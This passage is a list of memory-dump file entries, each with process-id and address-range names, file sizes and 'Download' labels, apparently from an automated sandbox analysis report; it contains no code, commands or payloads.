memory/3416-347-0x0000000005130000-0x000000000516C000-memory.dmp

Filesize
240KB

Download
memory/3416-340-0x0000000005EE0000-0x00000000064F8000-memory.dmp

Filesize
6.1MB

Download
memory/3416-346-0x00000000050D0000-0x00000000050E2000-memory.dmp

Filesize
72KB

Download
memory/3416-397-0x0000000005AE0000-0x0000000005B46000-memory.dmp

Filesize
408KB

Download
memory/3484-1312-0x0000000000730000-0x0000000000DE0000-memory.dmp

Filesize
6.7MB

Download
memory/3484-839-0x0000000000730000-0x0000000000DE0000-memory.dmp

Filesize
6.7MB

Download
memory/3616-685-0x0000000000E60000-0x00000000017EF000-memory.dmp

Filesize
9.6MB

Download
memory/3616-209-0x0000000000E60000-0x00000000017EF000-memory.dmp

Filesize
9.6MB

Download
memory/3620-523-0x0000000005A00000-0x0000000005D54000-memory.dmp

Filesize
3.3MB

Download
memory/3620-521-0x00000000051E0000-0x0000000005202000-memory.dmp

Filesize
136KB

Download
memory/3620-497-0x00000000052C0000-0x00000000058E8000-memory.dmp

Filesize
6.2MB

Download
memory/3620-496-0x0000000000EE0000-0x0000000000F16000-memory.dmp

Filesize
216KB

Download
memory/3620-522-0x0000000005920000-0x0000000005986000-memory.dmp

Filesize
408KB

Download
memory/4124-363-0x0000000000400000-0x00000000007B8000-memory.dmp

Filesize
3.7MB

Download
memory/4124-370-0x0000000000400000-0x00000000007B8000-memory.dmp

Filesize
3.7MB

Download
memory/4132-1379-0x0000000005230000-0x0000000005584000-memory.dmp

Filesize
3.3MB

Download
memory/4132-1381-0x0000000005850000-0x000000000589C000-memory.dmp

Filesize
304KB

Download
memory/4152-1706-0x0000000000350000-0x0000000000A04000-memory.dmp

Filesize
6.7MB

Download
memory/4152-1343-0x0000000000350000-0x0000000000A04000-memory.dmp

Filesize
6.7MB

Download
memory/4248-743-0x00000000002C0000-0x0000000000970000-memory.dmp

Filesize
6.7MB

Download
memory/4248-375-0x00000000002C0000-0x0000000000970000-memory.dmp

Filesize
6.7MB

Download
memory/4344-420-0x0000000000010000-0x00000000004CE000-memory.dmp

Filesize
4.7MB

Download
memory/4344-426-0x0000000004F60000-0x000000000506A000-memory.dmp

Filesize
1.0MB

Download
memory/4344-423-0x0000000004D10000-0x0000000004D1A000-memory.dmp

Filesize
40KB

Download
memory/4484-540-0x000000000A4D0000-0x000000000A9FC000-memory.dmp

Filesize
5.2MB

Download
memory/4484-351-0x0000000000400000-0x0000000000472000-memory.dmp

Filesize
456KB

Download
memory/4484-528-0x0000000009400000-0x0000000009476000-memory.dmp

Filesize
472KB

Download
memory/4484-529-0x0000000009380000-0x000000000939E000-memory.dmp

Filesize
120KB

Download
memory/4484-538-0x0000000009DD0000-0x0000000009F92000-memory.dmp

Filesize
1.8MB

Download
memory/4500-776-0x00000000007F0000-0x0000000000CA9000-memory.dmp

Filesize
4.7MB

Download
memory/4500-773-0x00000000007F0000-0x0000000000CA9000-memory.dmp

Filesize
4.7MB

Download
memory/4616-2-0x00007FFB5AEC0000-0x00007FFB5AEC2000-memory.dmp

Filesize
8KB

Download
memory/4616-3-0x00007FFB5AED0000-0x00007FFB5AED2000-memory.dmp

Filesize
8KB

Download
memory/4616-1-0x00007FFB5AEB0000-0x00007FFB5AEB2000-memory.dmp

Filesize
8KB

Download
memory/4616-0-0x00007FF6FA776000-0x00007FF6FA9EF000-memory.dmp

Filesize
2.5MB

Download
memory/4616-398-0x00007FF6FA610000-0x00007FF6FAE45000-memory.dmp

Filesize
8.2MB

Download
memory/4616-396-0x00007FF6FA776000-0x00007FF6FA9EF000-memory.dmp

Filesize
2.5MB

Download
memory/4616-151-0x00007FF6FA610000-0x00007FF6FAE45000-memory.dmp

Filesize
8.2MB

Download
memory/4616-141-0x00007FF6FA776000-0x00007FF6FA9EF000-memory.dmp

Filesize
2.5MB

Download
memory/4616-8-0x00007FFB58BE0000-0x00007FFB58BE2000-memory.dmp

Filesize
8KB

Download
memory/4616-5-0x00007FF6FA610000-0x00007FF6FAE45000-memory.dmp

Filesize
8.2MB

Download
memory/4616-6-0x00007FFB5A640000-0x00007FFB5A642000-memory.dmp

Filesize
8KB

Download
memory/4616-7-0x00007FFB58BD0000-0x00007FFB58BD2000-memory.dmp

Filesize
8KB

Download
memory/4616-4-0x00007FFB5A630000-0x00007FFB5A632000-memory.dmp

Filesize
8KB

Download
memory/4768-524-0x0000000006290000-0x00000000062AE000-memory.dmp

Filesize
120KB

Download
memory/4824-813-0x00000233F3DA0000-0x00000233F3DC2000-memory.dmp

Filesize
136KB

Download
memory/4932-200-0x00000000008F0000-0x00000000014E2000-memory.dmp

Filesize
11.9MB

Download
memory/4932-588-0x00000000008F0000-0x00000000014E2000-memory.dmp

Filesize
11.9MB

Download